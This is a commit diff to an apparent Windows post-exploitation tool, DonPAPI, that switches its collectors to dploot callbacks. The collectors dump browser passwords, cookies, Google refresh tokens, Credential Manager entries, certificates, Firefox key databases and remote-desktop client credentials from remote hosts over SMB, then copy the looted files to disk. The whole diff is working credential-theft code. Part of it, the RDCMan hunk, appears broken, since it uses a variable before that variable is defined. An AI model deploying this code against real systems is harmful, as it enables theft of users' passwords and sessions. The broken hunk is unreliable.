Update dploot (login-securite#110)

* update dploot and related functions

* update dependencies

Author: zblurx

donpapi/collectors/Certificates.py

@@ -22,19 +22,17 @@ def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list,
 
     def run(self) -> None:
         self.logger.display(f"Dumping User{' and Machine' if self.context.remoteops_allowed else ''} Certificates")
-        certificates_triage = CertificatesTriage(target=self.target, conn=self.conn, masterkeys=self.masterkeys)
-        certificates = certificates_triage.triage_certificates()
-        for certificate in certificates:
+
+        def certificate_callback(certificate):
             cert_username = certificate.username.rstrip("\x00")
             filename = f"{cert_username}_{certificate.filename[:16]}.pfx"
             self.print_and_store(certificate, cert_username, filename)
-        
+
+        certificates_triage = CertificatesTriage(target=self.target, conn=self.conn, masterkeys=self.masterkeys, per_certificate_callback=certificate_callback,)
+        certificates_triage.triage_certificates()
         if self.context.remoteops_allowed:
-            system_certificates = certificates_triage.triage_system_certificates()
-            for certificate in system_certificates:
-                cert_username = certificate.username.rstrip("\x00")
-                filename = f"{cert_username}_{certificate.filename[:16]}.pfx"
-                self.print_and_store(certificate, cert_username, filename)
+            certificates_triage.triage_system_certificates()
+            
 
     def print_and_store(self, certificate, cert_username, filename) -> None:
         absolute_local_filepath = path.join(self.context.target_output_dir, filename)

donpapi/collectors/Chromium.py

@@ -1,7 +1,8 @@
 from typing import Any
 from dploot.lib.target import Target
 from dploot.lib.smb import DPLootSMBConnection
-from dploot.triage.browser import BrowserTriage, LoginData, GoogleRefreshToken
+from dploot.lib.utils import dump_looted_files_to_disk
+from dploot.triage.browser import BrowserTriage, LoginData, GoogleRefreshToken, Cookie
 from donpapi.core import DonPAPICore
 from donpapi.lib.logger import DonPAPIAdapter
 
@@ -20,28 +21,30 @@ def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list,
 
     def run(self):
         self.logger.display("Dumping User Chromium Browsers")
-        browser_triage = BrowserTriage(target=self.target, conn=self.conn, masterkeys=self.masterkeys)
-        browser_credentials, cookies = browser_triage.triage_browsers(gather_cookies=True)
-        for credential in browser_credentials:
+
+        def browser_callback(credential):
             if isinstance(credential, LoginData):
                 cred_url = credential.url + " -" if credential.url != "" else "-"
                 self.logger.secret(f"[{credential.winuser}] [Password] {cred_url} {credential.username}:{credential.password}", f"{credential.browser.upper()}")
                 self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user=credential.winuser, username=credential.username, password=credential.password, target=credential.url, program=credential.browser.title())
             elif isinstance(credential, GoogleRefreshToken):
                 self.logger.secret(f"[{credential.winuser}] [Google Refresh Token] {credential.service}:{credential.token}", f"{credential.browser.upper()}")
                 self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user=credential.winuser, username=credential.service, password=credential.token, target="Google Refresh Token", program=credential.browser.title())
-        for cookie in cookies:
-            if cookie.cookie_value != "":
-                self.logger.secret(f"[{cookie.winuser}] [Cookie] {cookie.host}{cookie.path} - {cookie.cookie_name}:{cookie.cookie_value}",f"{cookie.browser.upper()}")
-                self.context.db.add_cookie(
-                    computer=self.context.host,
-                    browser=cookie.browser,
-                    windows_user=cookie.winuser,
-                    url=f"{cookie.host}{cookie.path}",
-                    cookie_name=cookie.cookie_name,
-                    cookie_value=cookie.cookie_value,
-                    creation_utc=cookie.creation_utc,
-                    expires_utc=cookie.expires_utc, 
-                    last_access_utc=cookie.last_access_utc,
-                )
-        
+            elif isinstance(credential, Cookie):
+                if credential.cookie_value != "":
+                    self.logger.secret(f"[{credential.winuser}] [Cookie] {credential.host}{credential.path} - {credential.cookie_name}:{credential.cookie_value}",f"{credential.browser.upper()}")
+                    self.context.db.add_cookie(
+                        computer=self.context.host,
+                        browser=credential.browser,
+                        windows_user=credential.winuser,
+                        url=f"{credential.host}{credential.path}",
+                        cookie_name=credential.cookie_name,
+                        cookie_value=credential.cookie_value,
+                        creation_utc=credential.creation_utc,
+                        expires_utc=credential.expires_utc, 
+                        last_access_utc=credential.last_access_utc,
+                    )
+
+        browser_triage = BrowserTriage(target=self.target, conn=self.conn, masterkeys=self.masterkeys, per_secret_callback=browser_callback)
+        browser_triage.triage_browsers(gather_cookies=True)
+        dump_looted_files_to_disk(self.context.target_output_dir, browser_triage.looted_files)

donpapi/collectors/CredMan.py

@@ -2,6 +2,7 @@
 from dploot.lib.target import Target
 from dploot.lib.smb import DPLootSMBConnection
 from dploot.triage.credentials import CredentialsTriage
+from dploot.lib.utils import dump_looted_files_to_disk
 from donpapi.core import DonPAPICore
 from donpapi.lib.logger import DonPAPIAdapter
 
@@ -20,13 +21,12 @@ def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list,
 
     def run(self):
         self.logger.display(f"Dumping User{' and Machine' if self.context.remoteops_allowed else ''} Credential Manager")
-        credentials_triage = CredentialsTriage(target=self.target, conn=self.conn, masterkeys=self.masterkeys)
-        credentials = credentials_triage.triage_credentials()
-        for credential in credentials:
+        def credman_callback(credential):
             self.logger.secret(f"[{credential.winuser}] {credential.target} - {credential.username}:{credential.password}", self.tag)
             self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user=credential.winuser, username=credential.username.rstrip("\x00"), password=credential.password.rstrip("\x00"), target=credential.target.rstrip("\x00"))
+        credentials_triage = CredentialsTriage(target=self.target, conn=self.conn, masterkeys=self.masterkeys, per_credential_callback=credman_callback)
+        credentials_triage.triage_credentials()
         if self.context.remoteops_allowed:
-            system_credentials = credentials_triage.triage_system_credentials()
-            for credential in system_credentials:
-                self.logger.secret(f"[SYSTEM] {credential.target} - {credential.username}:{credential.password}", self.tag)
-                self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user="SYSTEM", username=credential.username.rstrip("\x00"), password=credential.password.rstrip("\x00"), target=credential.target.rstrip("\x00"))
+            credentials_triage.triage_system_credentials()
+        
+        dump_looted_files_to_disk(self.context.target_output_dir, credentials_triage.looted_files)

donpapi/collectors/Firefox.py

@@ -1,6 +1,7 @@
 import hmac
 import json
 import ntpath
+import os
 import sqlite3
 import tempfile
 from os import remove
@@ -15,6 +16,7 @@
 from dploot.lib.target import Target
 from donpapi.core import DonPAPICore
 from donpapi.lib.logger import DonPAPIAdapter
+from donpapi.lib.utils import dump_file_to_loot_directories
 
 
 CKA_ID = unhexlify("f8000000000000000000000000000001")
@@ -94,18 +96,21 @@ def collect(self):
                     cookies_data = self.conn.readFile(self.context.share, cookies_path)
                     if cookies_data is not None:
                         firefox_cookies += self.parse_cookie_data(user, cookies_data)
+                        dump_file_to_loot_directories(os.path.join(self.context.target_output_dir, *(cookies_path.split('\\'))), cookies_data)
 
                     logins_path = self.firefox_generic_path.format(user) + "\\" + d.get_longname() + "\\logins.json"
                     logins_data = self.conn.readFile(self.context.share, logins_path)
                     if logins_data is None:
                         continue  # No logins.json file found
+                    dump_file_to_loot_directories(os.path.join(self.context.target_output_dir, *(logins_path.split('\\'))), logins_data)
                     logins = self.get_login_data(logins_data=logins_data)
                     if len(logins) == 0:
                         continue  # No logins profile found
                     key4_path = self.firefox_generic_path.format(user) + "\\" + d.get_longname() + "\\key4.db"
                     key4_data = self.conn.readFile(self.context.share, key4_path, bypass_shared_violation=True)
                     if key4_data is None:
                         continue
+                    dump_file_to_loot_directories(os.path.join(self.context.target_output_dir, *(key4_path.split('\\'))), key4_data)
                     key = self.get_key(key4_data=key4_data)
                     if key is None and self.target.password != "":
                         key = self.get_key(

donpapi/collectors/MRemoteNG.py

@@ -1,5 +1,6 @@
 import ntpath
 import hashlib
+import os
 from typing import Any
 from lxml import objectify
 from base64 import b64decode
@@ -9,6 +10,7 @@
 from dploot.lib.smb import DPLootSMBConnection
 from donpapi.core import DonPAPICore
 from donpapi.lib.logger import DonPAPIAdapter
+from donpapi.lib.utils import dump_file_to_loot_directories
 
 
 @dataclass
@@ -48,6 +50,7 @@ def run(self):
                     content = self.conn.readFile(self.context.share, tmp_confcons_path)
                     if content is None:
                         continue
+                    dump_file_to_loot_directories(os.path.join(self.context.target_output_dir, *(tmp_confcons_path.split('\\'))), content)
                     main = objectify.fromstring(content)
                     try:
                         encryption_attributes = MRemoteNgEncryptionAttributes(

donpapi/collectors/MobaXTerm.py

@@ -1,6 +1,7 @@
 from typing import Any
 from dploot.lib.target import Target
 from dploot.lib.smb import DPLootSMBConnection
+from dploot.lib.utils import dump_looted_files_to_disk
 from dploot.triage.mobaxterm import MobaXtermTriage, MobaXtermCredential, MobaXtermPassword
 from donpapi.core import DonPAPICore
 from donpapi.lib.logger import DonPAPIAdapter
@@ -21,16 +22,17 @@ def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list,
     def run(self):
         if self.context.remoteops_allowed:
             self.logger.display("Dumping MobaXterm credentials")
-            mobaxterm_triage = MobaXtermTriage(target=self.target, conn=self.conn, masterkeys=self.masterkeys)
+            def mobaxterm_callback(credential):
+                if isinstance(credential, MobaXtermCredential):
+                    self.logger.secret(f"[Credential] [{credential.winuser}] {credential.name} - {credential.username}:{credential.password.decode('latin-1')}", self.tag)
+                    self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user=credential.winuser, program=self.tag, username=credential.username, password=credential.password.decode('latin-1'))
+                elif isinstance(credential, MobaXtermPassword):
+                    self.logger.secret(f"[Password] [{credential.winuser}] {credential.username}:{credential.password.decode('latin-1')}", self.tag) 
+                    self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user=credential.winuser, program=self.tag, username=credential.username, password=credential.password.decode('latin-1'))
+            mobaxterm_triage = MobaXtermTriage(target=self.target, conn=self.conn, masterkeys=self.masterkeys, per_secret_callback=mobaxterm_callback)
             try:
-                _, credentials = mobaxterm_triage.triage_mobaxterm()
-                for credential in credentials:
-                    if isinstance(credential, MobaXtermCredential):
-                        self.logger.secret(f"[Credential] [{credential.winuser}] {credential.name} - {credential.username}:{credential.password.decode('latin-1')}", self.tag)
-                        self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user=credential.winuser, program=self.tag, username=credential.username, password=credential.password.decode('latin-1'))
-                    elif isinstance(credential, MobaXtermPassword):
-                        self.logger.secret(f"[Password] [{credential.winuser}] {credential.username}:{credential.password.decode('latin-1')}", self.tag) 
-                        self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user=credential.winuser, program=self.tag, username=credential.username, password=credential.password.decode('latin-1'))
+                mobaxterm_triage.triage_mobaxterm()
+                dump_looted_files_to_disk(self.context.target_output_dir, mobaxterm_triage.looted_files)
             except Exception as e:
                 if "ERROR_FILE_NOT_FOUND" not in str(e):
                     self.logger.error(f"Error while dumping mobaxterm: {e}")

donpapi/collectors/RDCMan.py

@@ -1,7 +1,8 @@
 from typing import Any
 from dploot.lib.target import Target
 from dploot.lib.smb import DPLootSMBConnection
-from dploot.triage.rdg import RDGTriage
+from dploot.triage.rdg import RDGTriage, RDGServerProfile
+from dploot.lib.utils import dump_looted_files_to_disk
 from donpapi.core import DonPAPICore
 from donpapi.lib.logger import DonPAPIAdapter
 
@@ -26,16 +27,23 @@ def run(self):
             if rdcman_file is None:
                 continue
             for rdg_cred in rdcman_file.rdg_creds:
-                if rdg_cred.type in ["cred", "logon", "server"]:
-                    log_text = f"{rdg_cred.server_name} - {rdg_cred.username}:{rdg_cred.password.decode('latin-1')}" if rdg_cred.type == "server" else f"{rdg_cred.username}:{rdg_cred.password.decode('latin-1')}"
-                    self.logger.secret(f"[{rdcman_file.winuser}][{rdg_cred.profile_name}] {log_text}", self.tag)
-                    self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user=rdcman_file.winuser, username=rdg_cred.username, password=rdg_cred.password.decode("latin-1"), target=rdg_cred.server_name if rdg_cred.type == "server" else "")         
+                target = ""
+                log_text = f"{rdg_cred.username}:{rdg_cred.password.decode('latin-1')}"
+                if isinstance(rdg_cred,RDGServerProfile):
+                    target = rdg_cred.server_name
+                    log_text = f"{rdg_cred.server_name} - {log_text}"
+                    self.logger.secret(f"[{rdgfile.winuser}][{rdg_cred.profile_name}] {log_text}", self.tag)
+                    self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user=rdcman_file.winuser, username=rdg_cred.username, password=rdg_cred.password.decode("latin-1"), target=target)        
         for rdgfile in rdgfiles:
             if rdgfile is None:
                 continue
             for rdg_cred in rdgfile.rdg_creds:
+                target = ""
                 log_text = f"{rdg_cred.username}:{rdg_cred.password.decode('latin-1')}"
-                if rdg_cred.type == "server":
+                if isinstance(rdg_cred,RDGServerProfile):
+                    target = rdg_cred.server_name
                     log_text = f"{rdg_cred.server_name} - {log_text}"
                 self.logger.secret(f"[{rdgfile.winuser}][{rdg_cred.profile_name}] {log_text}", self.tag)
-                self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user=rdcman_file.winuser, username=rdg_cred.username, password=rdg_cred.password.decode("latin-1"), target=rdg_cred.server_name if rdg_cred.type == "server" else "")         
+                self.context.db.add_secret(computer=self.context.host, collector=self.tag, windows_user=rdcman_file.winuser, username=rdg_cred.username, password=rdg_cred.password.decode("latin-1"), target=target)
+
+        dump_looted_files_to_disk(self.context.target_output_dir, rdg_triage.looted_files)